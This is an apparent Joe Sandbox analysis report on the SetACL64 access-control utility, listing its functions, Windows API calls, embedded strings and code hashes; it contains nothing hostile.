Associated: 00000007.00000002.1713808798.00007FF68688B000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.1713837587.00007FF6868AE000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.1713858003.00007FF6868B2000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.1713858003.00007FF6868B7000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_7ff686820000_SetACL64.jbxd

Similarity

API ID: _invalid_parameter_noinfo_noreturn$ErrorLastSecurity$Valid$AbsoluteCloseKernelMakeObject$CreateDescriptorFileFreeHandleInfoLocalNamed
String ID: SeSecurityPrivilege
API String ID: 3247214862-2333288578
Opcode ID: 054ea4d1a2d6c0b3adbe8e4b57b4ca5633b3a582fabd17bd529d99db77766a5b
Instruction ID: edb9810a3074a850746ac64d15d38870c9d3946d00b1f313f91ea40711b06da2
Opcode Fuzzy Hash: 054ea4d1a2d6c0b3adbe8e4b57b4ca5633b3a582fabd17bd529d99db77766a5b
Instruction Fuzzy Hash: FA42A1A2B19742C6FB149B65D4483AD23A2FF44B88F404139DB4E97BA5DF7EE890C350

Function 00007FF686843A5E Relevance: 30.2, APIs: 11, Strings: 6, Instructions: 464
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

AdjustTokenPrivileges.KERNELBASE ref: 00007FF686843A86
GetLastError.KERNEL32 ref: 00007FF686843A90
CloseHandle.KERNELBASE ref: 00007FF686843A9F
GetLastError.KERNEL32 ref: 00007FF686843AA9
CloseHandle.KERNEL32 ref: 00007FF686843AB6
GetCurrentProcess.KERNEL32 ref: 00007FF686843CC0
OpenProcessToken.ADVAPI32 ref: 00007FF686843CD3
GetLastError.KERNEL32 ref: 00007FF686843CDD

Strings

Privilege 'Restore files and directories' could not be enabled. SetACL's powers are restricted. Better run SetACL with admin right, xrefs: 00007FF686843E37
Privilege 'Back up files and directories' could not be enabled. SetACL's powers are restricted. Better run SetACL with admin right, xrefs: 00007FF686843B7A
Prepare, xrefs: 00007FF686843BAA, 00007FF686843E67, 00007FF686844124
Privilege 'Take ownership of files or other objects' could not be enabled. SetACL's powers are restricted. Better run SetACL with , xrefs: 00007FF6868440F4
SeRestorePrivilege, xrefs: 00007FF686843C7C
SeTakeOwnershipPrivilege, xrefs: 00007FF686843F39

Memory Dump Source

Source File: 00000007.00000002.1713758258.00007FF686821000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF686820000, based on PE: true

Associated: 00000007.00000002.1713739107.00007FF686820000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.1713808798.00007FF68688B000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.1713837587.00007FF6868AE000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.1713858003.00007FF6868B2000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.1713858003.00007FF6868B7000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_7ff686820000_SetACL64.jbxd

Similarity

API ID: ErrorLast$CloseHandleProcessToken$AdjustCurrentOpenPrivileges
String ID: Prepare$Privilege 'Back up files and directories' could not be enabled. SetACL's powers are restricted. Better run SetACL with admin right$Privilege 'Restore files and directories' could not be enabled. SetACL's powers are restricted. Better run SetACL with admin right$Privilege 'Take ownership of files or other objects' could not be enabled. SetACL's powers are restricted. Better run SetACL with $SeRestorePrivilege$SeTakeOwnershipPrivilege
API String ID: 637398405-1541018277
Opcode ID: 784cef284bd62b761dc482660273cd6918b6e7e394081ec7e667ddc71951a65c
Instruction ID: 7297aa4543ed2d95f5a876edb80cd7939455c8c289724e75e36796354c795d8c
Opcode Fuzzy Hash: 784cef284bd62b761dc482660273cd6918b6e7e394081ec7e667ddc71951a65c
Instruction Fuzzy Hash: ED22A5B2A18782C2EE10CB55E4483696365FF847E4F505139E69D87AE9DFBEE880C710

Function 00007FF68685E4B0 Relevance: 21.5, APIs: 11, Strings: 1, Instructions: 483
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

ConvertStringSidToSidW.ADVAPI32 ref: 00007FF68685E511
LocalFree.KERNEL32 ref: 00007FF68685E52E
DsGetDcNameW.NETAPI32 ref: 00007FF68685E891
NetApiBufferFree.NETAPI32 ref: 00007FF68685E90B

Part of subcall function 00007FF686860C18: std::_Lockit::_Lockit.LIBCPMT ref: 00007FF686860C35
Part of subcall function 00007FF686860C18: std::locale::_Setgloballocale.LIBCPMT ref: 00007FF686860C58
Part of subcall function 00007FF686860C18: std::_Lockit::~_Lockit.LIBCPMT ref: 00007FF686860CF3

Part of subcall function 00007FF68685F3C0: LookupAccountNameW.ADVAPI32 ref: 00007FF68685F44D
Part of subcall function 00007FF68685F3C0: GetLastError.KERNEL32(?,?,?,?,?,?,00000000,00000000,?,?,FFFFFFFF,?,00000001,00007FF68685E9EF), ref: 00007FF68685F453
Part of subcall function 00007FF68685F3C0: GetLastError.KERNEL32(?,?,?,?,?,?,00000000,00000000,?,?,FFFFFFFF,?,00000001,00007FF68685E9EF), ref: 00007FF68685F45E

_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF68685EBEF
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF68685EBFB
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF68685EC01
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF68685EC07
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF68685EC0D
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF68685EC13
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF68685EC19

Strings

computername, xrefs: 00007FF68685E73B

Memory Dump Source

Source File: 00000007.00000002.1713758258.00007FF686821000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF686820000, based on PE: true

Associated: 00000007.00000002.1713739107.00007FF686820000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.1713808798.00007FF68688B000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.1713837587.00007FF6868AE000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.1713858003.00007FF6868B2000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.1713858003.00007FF6868B7000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_7ff686820000_SetACL64.jbxd

Similarity

API ID: _invalid_parameter_noinfo_noreturn$ErrorFreeLastLockitNamestd::_$AccountBufferConvertLocalLockit::_Lockit::~_LookupSetgloballocaleStringstd::locale::_
String ID: computername
API String ID: 1703289946-1800712684
Opcode ID: 16028561b5196d3668939a84b08cd2e3c1b912715faf0080cf177397a5bfcfa2
Instruction ID: 898f2eeaf6843ea59616fa1c987da8b1c1ca5a90c25562f0e3334e17b6b24c0e
Opcode Fuzzy Hash: 16028561b5196d3668939a84b08cd2e3c1b912715faf0080cf177397a5bfcfa2
Instruction Fuzzy Hash: E72290A2B14B52C6FB008B68E84D3AD2371BF44798F405639DE5E97AD9DF39E841C320

Function 00007FF686843D1B Relevance: 21.3, APIs: 8, Strings: 4, Instructions: 345
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

AdjustTokenPrivileges.KERNELBASE ref: 00007FF686843D43
GetLastError.KERNEL32 ref: 00007FF686843D4D
CloseHandle.KERNEL32 ref: 00007FF686843D5C
GetLastError.KERNEL32 ref: 00007FF686843D66
CloseHandle.KERNEL32 ref: 00007FF686843D73
GetCurrentProcess.KERNEL32 ref: 00007FF686843F7D
OpenProcessToken.ADVAPI32 ref: 00007FF686843F90
GetLastError.KERNEL32 ref: 00007FF686843F9A

Strings

Privilege 'Restore files and directories' could not be enabled. SetACL's powers are restricted. Better run SetACL with admin right, xrefs: 00007FF686843E37
Prepare, xrefs: 00007FF686843E67, 00007FF686844124
Privilege 'Take ownership of files or other objects' could not be enabled. SetACL's powers are restricted. Better run SetACL with , xrefs: 00007FF6868440F4
SeTakeOwnershipPrivilege, xrefs: 00007FF686843F39

Memory Dump Source

Source File: 00000007.00000002.1713758258.00007FF686821000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF686820000, based on PE: true

Associated: 00000007.00000002.1713739107.00007FF686820000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.1713808798.00007FF68688B000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.1713837587.00007FF6868AE000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.1713858003.00007FF6868B2000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.1713858003.00007FF6868B7000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_7ff686820000_SetACL64.jbxd

Similarity

API ID: ErrorLast$CloseHandleProcessToken$AdjustCurrentOpenPrivileges
String ID: Prepare$Privilege 'Restore files and directories' could not be enabled. SetACL's powers are restricted. Better run SetACL with admin right$Privilege 'Take ownership of files or other objects' could not be enabled. SetACL's powers are restricted. Better run SetACL with $SeTakeOwnershipPrivilege
API String ID: 637398405-1701055250
Opcode ID: 37c1be51e2417e488a72d3dcc0cf2b981f55e4b54b9d20b9a241d83790859c59
Instruction ID: d6ebd7ad4d04b0742e7c3d1876236b290937e98c7a16907e16e8ffb0d61cd811
Opcode Fuzzy Hash: 37c1be51e2417e488a72d3dcc0cf2b981f55e4b54b9d20b9a241d83790859c59
Instruction Fuzzy Hash: ACE1A2B2B18786C2EE10CB55E4483696365FF847E4F505139EA5D87AE8DFBEE880C710

Function 00007FF68683D304 Relevance: 16.8, APIs: 11, Instructions: 288
timethreadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetSystemTimeAsFileTime.KERNEL32 ref: 00007FF68683D335
GetCurrentThreadId.KERNEL32 ref: 00007FF68683D35F
GetUserNameExW.SECUR32 ref: 00007FF68683D39C
GetLastError.KERNEL32 ref: 00007FF68683D3A6
GetUserNameExW.SECUR32 ref: 00007FF68683D3DC
GetLastError.KERNEL32 ref: 00007FF68683D3E6
LeaveCriticalSection.KERNEL32 ref: 00007FF68683D52A

Part of subcall function 00007FF68683EA60: WaitForSingleObject.KERNEL32 ref: 00007FF68683EA79
Part of subcall function 00007FF68683EA60: ResetEvent.KERNEL32 ref: 00007FF68683EABC
Part of subcall function 00007FF68683EA60: ReleaseMutex.KERNEL32 ref: 00007FF68683EAC6
Part of subcall function 00007FF68683EA60: SetEvent.KERNEL32 ref: 00007FF68683EAD0

LeaveCriticalSection.KERNEL32 ref: 00007FF68683D662

Memory Dump Source

Source File: 00000007.00000002.1713758258.00007FF686821000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF686820000, based on PE: true

Associated: 00000007.00000002.1713739107.00007FF686820000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.1713808798.00007FF68688B000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.1713837587.00007FF6868AE000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.1713858003.00007FF6868B2000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.1713858003.00007FF6868B7000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_7ff686820000_SetACL64.jbxd

Similarity

API ID: CriticalErrorEventLastLeaveNameSectionTimeUser$CurrentFileMutexObjectReleaseResetSingleSystemThreadWait
String ID:
API String ID: 3424761043-0
Opcode ID: 82ea7e4afd397da255eb45e089590796cd57700379ab681c382546437c843004
Instruction ID: 5a9a26cd481a4aafe4b8519b3825663fe5e4ac1cd163496f22314ffde96ce16c
Opcode Fuzzy Hash: 82ea7e4afd397da255eb45e089590796cd57700379ab681c382546437c843004
Instruction Fuzzy Hash: 93C18AA2B18B42C6EB108F64E4842AC3371FF49B98F404639DA5D977A9DF3DE944C760

Function 00007FF68685F3C0 Relevance: 13.7, APIs: 9, Instructions: 187
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LookupAccountNameW.ADVAPI32 ref: 00007FF68685F44D
GetLastError.KERNEL32(?,?,?,?,?,?,00000000,00000000,?,?,FFFFFFFF,?,00000001,00007FF68685E9EF), ref: 00007FF68685F453
GetLastError.KERNEL32(?,?,?,?,?,?,00000000,00000000,?,?,FFFFFFFF,?,00000001,00007FF68685E9EF), ref: 00007FF68685F45E
LookupAccountNameW.ADVAPI32 ref: 00007FF68685F54D
GetLastError.KERNEL32(?,?,?,?,?,?,00000000,00000000,?,?,FFFFFFFF,?,00000001,00007FF68685E9EF), ref: 00007FF68685F557
IsValidSid.ADVAPI32(?,?,?,?,?,?,00000000,00000000,?,?,FFFFFFFF,?,00000001,00007FF68685E9EF), ref: 00007FF68685F593
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF68685F647
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF68685F64D
Concurrency::cancel_current_task.LIBCPMT ref: 00007FF68685F653

Memory Dump Source

Source File: 00000007.00000002.1713758258.00007FF686821000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF686820000, based on PE: true

Associated: 00000007.00000002.1713739107.00007FF686820000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.1713808798.00007FF68688B000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.1713837587.00007FF6868AE000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.1713858003.00007FF6868B2000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.1713858003.00007FF6868B7000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_7ff686820000_SetACL64.jbxd

Similarity

API ID: ErrorLast$AccountLookupName_invalid_parameter_noinfo_noreturn$Concurrency::cancel_current_taskValid
String ID:
API String ID: 311209037-0
Opcode ID: c7e2f3c1dd69d1f4acddb5ab312ab4255335677c4fd2a3498e6ade446b79d788
Instruction ID: 7838ea96591f6919d988251c95671d1217f67598a4a12cd07ed5671115db3171
Opcode Fuzzy Hash: c7e2f3c1dd69d1f4acddb5ab312ab4255335677c4fd2a3498e6ade446b79d788
Instruction Fuzzy Hash: B371B3A2A18B82C1EA249F11A54837D72A5FF84BD4F544339DA5E87794DF3DE840C760

Function 00007FF686843FD8 Relevance: 12.5, APIs: 5, Strings: 2, Instructions: 226
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

AdjustTokenPrivileges.KERNELBASE ref: 00007FF686844000
GetLastError.KERNEL32 ref: 00007FF68684400A
CloseHandle.KERNEL32 ref: 00007FF686844019
GetLastError.KERNEL32 ref: 00007FF686844023
CloseHandle.KERNEL32 ref: 00007FF686844030

Strings

Prepare, xrefs: 00007FF686844124
Privilege 'Take ownership of files or other objects' could not be enabled. SetACL's powers are restricted. Better run SetACL with , xrefs: 00007FF6868440F4

Memory Dump Source

Source File: 00000007.00000002.1713758258.00007FF686821000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF686820000, based on PE: true

Associated: 00000007.00000002.1713739107.00007FF686820000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.1713808798.00007FF68688B000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.1713837587.00007FF6868AE000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.1713858003.00007FF6868B2000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.1713858003.00007FF6868B7000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_7ff686820000_SetACL64.jbxd

Similarity

API ID: CloseErrorHandleLast$AdjustPrivilegesToken
String ID: Prepare$Privilege 'Take ownership of files or other objects' could not be enabled. SetACL's powers are restricted. Better run SetACL with
API String ID: 1992325626-2245062721
Opcode ID: 711c004ea780279e093e6d90f040bc076e91dc0aa13779505b0cf60af36ac5f3
Instruction ID: 17c5320fa135c33c8e6c1b2a4bae653178f06b8b82d40f068ecf13cb63e997f2
Opcode Fuzzy Hash: 711c004ea780279e093e6d90f040bc076e91dc0aa13779505b0cf60af36ac5f3
Instruction Fuzzy Hash: 8DA19FB2B18786C2EA24CB55E0483A96365FF84BE4F405139DA5D876E4DFBEE880C710

Function 00007FF686876C40 Relevance: 10.7, APIs: 5, Strings: 1, Instructions: 222
COMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 00007FF686873E64: GetLastError.KERNEL32(?,?,?,00007FF6868699DD), ref: 00007FF686873E73
Part of subcall function 00007FF686873E64: SetLastError.KERNEL32(?,?,?,00007FF6868699DD), ref: 00007FF686873F11

TranslateName.LIBCMT ref: 00007FF686876CAD
TranslateName.LIBCMT ref: 00007FF686876CE8
GetACP.KERNEL32(?,?,?,00000000,00000092,00007FF686869674), ref: 00007FF686876D2D
IsValidCodePage.KERNEL32(?,?,?,00000000,00000092,00007FF686869674), ref: 00007FF686876D55

Strings

utf8, xrefs: 00007FF686876E39

Memory Dump Source

Source File: 00000007.00000002.1713758258.00007FF686821000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF686820000, based on PE: true

Associated: 00000007.00000002.1713739107.00007FF686820000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.1713808798.00007FF68688B000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.1713837587.00007FF6868AE000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.1713858003.00007FF6868B2000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.1713858003.00007FF6868B7000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_7ff686820000_SetACL64.jbxd

Similarity

API ID: ErrorLastNameTranslate$CodePageValid
String ID: utf8
API String ID: 2136749100-905460609
Opcode ID: 06256d3170ea4477562b1b0a5136ccd5b8742c98d410ffa777cce2510612fae9
Instruction ID: 9c102d64d270edf609c833b25d11542124b4314424bb4e8ea6a0ac4bf71eceeb
Opcode Fuzzy Hash: 06256d3170ea4477562b1b0a5136ccd5b8742c98d410ffa777cce2510612fae9
Instruction Fuzzy Hash: C9919AB2B08746C6EB209F21D840AA927B4FF85B84F544039DA4D87796DF7EED91C720

Function 00007FF6868213F0 Relevance: 4.5, APIs: 3, Instructions: 31synchronizationCOMMON

Download Yara Rule

APIs

CreateMutexExW.KERNELBASE ref: 00007FF6868213FB
CreateEventW.KERNEL32 ref: 00007FF686821412
CreateEventW.KERNEL32 ref: 00007FF686821429

Memory Dump Source

Source File: 00000007.00000002.1713758258.00007FF686821000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF686820000, based on PE: true

Associated: 00000007.00000002.1713739107.00007FF686820000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.1713808798.00007FF68688B000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.1713837587.00007FF6868AE000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.1713858003.00007FF6868B2000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.1713858003.00007FF6868B7000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_7ff686820000_SetACL64.jbxd

Similarity

API ID: Create$Event$Mutex
String ID:
API String ID: 646228171-0
Opcode ID: 6379593e08b2bd55a17043a86bbd2af44a1a5acfd305ab3cea2657f90ecb20a5
Instruction ID: 483f1282f2341bf1f79c2d7af73d9d32fde9014bd7fad07d434caa21cf24570a
Opcode Fuzzy Hash: 6379593e08b2bd55a17043a86bbd2af44a1a5acfd305ab3cea2657f90ecb20a5
Instruction Fuzzy Hash: 9A015EB1D28A52C2F314CB28BC5A7293691BF98311F505A3DD94DA59E0DF7F2440D721

Function 00007FF686843A20 Relevance: 47.8, APIs: 21, Strings: 6, Instructions: 509
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetLastError.KERNEL32 ref: 00007FF686843A20
GetCurrentProcess.KERNEL32 ref: 00007FF686843CC0
OpenProcessToken.ADVAPI32 ref: 00007FF686843CD3
GetLastError.KERNEL32 ref: 00007FF686843CDD
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF6868443FB
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF686844401
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF686844407
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF68684440D
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF686844413
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF686844419
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF68684441F
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF686844425
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF68684442B

Strings

Privilege 'Restore files and directories' could not be enabled. SetACL's powers are restricted. Better run SetACL with admin right, xrefs: 00007FF686843E37
Privilege 'Back up files and directories' could not be enabled. SetACL's powers are restricted. Better run SetACL with admin right, xrefs: 00007FF686843B7A
Prepare, xrefs: 00007FF686843BAA, 00007FF686843E67, 00007FF686844124
Privilege 'Take ownership of files or other objects' could not be enabled. SetACL's powers are restricted. Better run SetACL with , xrefs: 00007FF6868440F4
SeRestorePrivilege, xrefs: 00007FF686843C7C
SeTakeOwnershipPrivilege, xrefs: 00007FF686843F39

Memory Dump Source

Source File: 00000007.00000002.1713758258.00007FF686821000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF686820000, based on PE: true

Associated: 00000007.00000002.1713739107.00007FF686820000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.1713808798.00007FF68688B000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.1713837587.00007FF6868AE000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.1713858003.00007FF6868B2000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.1713858003.00007FF6868B7000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_7ff686820000_SetACL64.jbxd

Similarity

API ID: _invalid_parameter_noinfo_noreturn$ErrorLastProcess$CurrentOpenToken
String ID: Prepare$Privilege 'Back up files and directories' could not be enabled. SetACL's powers are restricted. Better run SetACL with admin right$Privilege 'Restore files and directories' could not be enabled. SetACL's powers are restricted. Better run SetACL with admin right$Privilege 'Take ownership of files or other objects' could not be enabled. SetACL's powers are restricted. Better run SetACL with $SeRestorePrivilege$SeTakeOwnershipPrivilege
API String ID: 6815931-1541018277
Opcode ID: e7fd04f08fec1a0ecb78bb51fd9c432250016c32d835b16c80ef034a2c114e38
Instruction ID: d3aeac8cba9e603a5d0f1641d2f012f4b63d9029f6ca9353756cfe1e6f409ec1
Opcode Fuzzy Hash: e7fd04f08fec1a0ecb78bb51fd9c432250016c32d835b16c80ef034a2c114e38
Instruction Fuzzy Hash: 0122B5F2A19782C2EE108B59E04836D6365FF857E4F405139E65D87AE9DFBEE880C710

Function 00007FF686842DCB Relevance: 46.0, APIs: 19, Strings: 7, Instructions: 532
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF6868434DB
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF6868434E1
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF6868434E7
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF686843503
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF686843509

Part of subcall function 00007FF68684B710: RegEnumKeyExW.ADVAPI32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,000001A1), ref: 00007FF68684B812

Part of subcall function 00007FF686829520: _invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF686829606
Part of subcall function 00007FF686829520: Concurrency::cancel_current_task.LIBCPMT ref: 00007FF68682960C

Strings

Run, xrefs: 00007FF6868430B5, 00007FF686843375
Object path and/or object type not specified., xrefs: 00007FF686843573
Action 'reset children' was used without specifying whether to reset the DACL, SACL, or both. Nothing was reset., xrefs: 00007FF68684307E
SetACL finished successfully., xrefs: 00007FF686843325
Prepare, xrefs: 00007FF6868435A1
/, xrefs: 00007FF686843481
read, xrefs: 00007FF686844AAB

Memory Dump Source

Source File: 00000007.00000002.1713758258.00007FF686821000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF686820000, based on PE: true

Associated: 00000007.00000002.1713739107.00007FF686820000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.1713808798.00007FF68688B000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.1713837587.00007FF6868AE000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.1713858003.00007FF6868B2000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.1713858003.00007FF6868B7000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_7ff686820000_SetACL64.jbxd

Similarity

API ID: _invalid_parameter_noinfo_noreturn$Concurrency::cancel_current_taskEnum
String ID: SetACL finished successfully.$/$Action 'reset children' was used without specifying whether to reset the DACL, SACL, or both. Nothing was reset.$Object path and/or object type not specified.$Prepare$Run$read
API String ID: 1222371136-710240214
Opcode ID: 6fd56c362ca3c0bd5d5ac0762c920353aa005472101274b7ea8be5c822556958
Instruction ID: a746cacaaaafb389c668c461b4964444e1aa38cca4b16b824fc192f3d3691853
Opcode Fuzzy Hash: 6fd56c362ca3c0bd5d5ac0762c920353aa005472101274b7ea8be5c822556958
Instruction Fuzzy Hash: D632E2A2B1D782C6EA24DB25D0853BE6365FF45780F40413AE65D876D6DFBEE840C720

Function 00007FF686857715 Relevance: 30.4, APIs: 16, Strings: 1, Instructions: 600registryfileCOMMON

Download Yara Rule

APIs

CreateFileW.KERNEL32 ref: 00007FF686857A14
GetLastError.KERNEL32 ref: 00007FF686857A35
CloseHandle.KERNEL32 ref: 00007FF686857B52
RegCloseKey.ADVAPI32 ref: 00007FF686857B62
SetSecurityInfo.ADVAPI32 ref: 00007FF686857C29

Part of subcall function 00007FF6868342A0: GetCurrentProcess.KERNEL32 ref: 00007FF6868342DA
Part of subcall function 00007FF6868342A0: OpenProcessToken.ADVAPI32 ref: 00007FF6868342EC
Part of subcall function 00007FF6868342A0: GetLastError.KERNEL32 ref: 00007FF6868342F6

NetShareGetInfo.NETAPI32 ref: 00007FF686857DD6
NetApiBufferFree.NETAPI32 ref: 00007FF686857E10
SetNamedSecurityInfoW.ADVAPI32 ref: 00007FF686857E5D
NetShareSetInfo.NETAPI32 ref: 00007FF686857EDA
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF686857FE2
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF686857FE8
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF686857FEE
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF686857FF4
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF686858000
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF686858006

Strings

SeSecurityPrivilege, xrefs: 00007FF686857749

Memory Dump Source

Source File: 00000007.00000002.1713758258.00007FF686821000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF686820000, based on PE: true

Associated: 00000007.00000002.1713739107.00007FF686820000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.1713808798.00007FF68688B000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.1713837587.00007FF6868AE000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.1713858003.00007FF6868B2000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.1713858003.00007FF6868B7000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_7ff686820000_SetACL64.jbxd

Similarity

API ID: _invalid_parameter_noinfo_noreturn$Info$CloseErrorLastProcessSecurityShare$BufferCreateCurrentFileFreeHandleNamedOpenToken
String ID: SeSecurityPrivilege
API String ID: 4200377542-2333288578
Opcode ID: 72c4d0f1dcd23645b0fd41c2eee2edcd0e185607ca5a744b2523e201e660a9b5
Instruction ID: 35b28d8166c50361eac63c5d4dc8efe04d8e99683064944ed3fb8332635ddf5f
Opcode Fuzzy Hash: 72c4d0f1dcd23645b0fd41c2eee2edcd0e185607ca5a744b2523e201e660a9b5
Instruction Fuzzy Hash: 884262A2A18782C5EB10CF25D4587AD23A1FF44798F508139DB5E87AD9DF7EE980C360

Function 00007FF68683DA7F Relevance: 21.1, APIs: 10, Strings: 2, Instructions: 129
synchronizationCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

SetEvent.KERNEL32 ref: 00007FF68683DA89
ReleaseMutex.KERNEL32 ref: 00007FF68683DA9D
EnterCriticalSection.KERNEL32 ref: 00007FF68683DACF

Strings

UNKNW,, xrefs: 00007FF68683DBDF
%s, xrefs: 00007FF68683DC4B

Memory Dump Source

